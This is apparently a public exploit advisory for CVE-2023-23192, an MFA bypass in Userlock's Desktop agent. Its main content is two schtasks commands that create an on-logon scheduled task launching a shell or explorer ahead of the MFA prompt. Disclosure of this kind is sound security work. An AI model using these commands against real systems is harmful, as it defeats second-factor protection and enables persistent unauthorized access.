CVE-2023-23192
CVE-2023-23192- Userlock - Multi-Factor Authentication (MFA) Bypass
Exploit Title: Userlock - Multi-Factor Authentication (MFA) Bypass
Date: 01/11/2023
Exploit Author: Pinar Sadioglu
Vendor Homepage: https://www.isdecisions.com/products/userlock/help/#
Version: < = 11.0.1.40
Tested on: Windows 10
Software : Tested with the Userlock 'Desktop agent' to protect interactive sessions on workstations or on terminal servers.
CVE : CVE-2023-23192
MITRE ATT&CK: T1053.005 - Scheduled Task/Job: Scheduled Task
Permissions Required: Administrator, Root
https://nvd.nist.gov/vuln/detail/CVE-2023-23192
Description: Userlock is a Multi-Factor Authentication solution for Windows Active Directory & Cloud Environments to stop unauthorized and unwanted access. It enables customized, two-factor authentication (2FA) on Windows logon, Remote Desktop (RDP & RD Gateway), IIS, VPN and Cloud Applications.Userlock allows you to implement MFA to your Active Directory logons domain joined workstations and servers. A dialog box is prompted where you can enter the OTP code, from the Authenticatior App at first logon of the day to their workstation. Userlock integrates with the logon process to deliver two-factor authentication.
One of the most commonly exploited strategies employed by threat actors to build persistence on a victim's computer is task scheduling. The adversary frequently use this strategy to evade automated detection, maintain persistence, and carry out surprise attacks after long periods of lying low.
Vulnerability:
Create a scheduled task that executed after at log on of any user.
> schtasks /create /tn "MFA_Bypass_OnLogon" /sc onlogon /tr "cmd.exe /c powershell.exe"
After successfully logging on with the domain credentials, scheduled cmd.exe is prompted with the Userlock MFA dialog box.
> schtasks /create /tn "MFA_Bypass_OnLogon" /sc onlogon /tr "cmd.exe /c explorer.exe"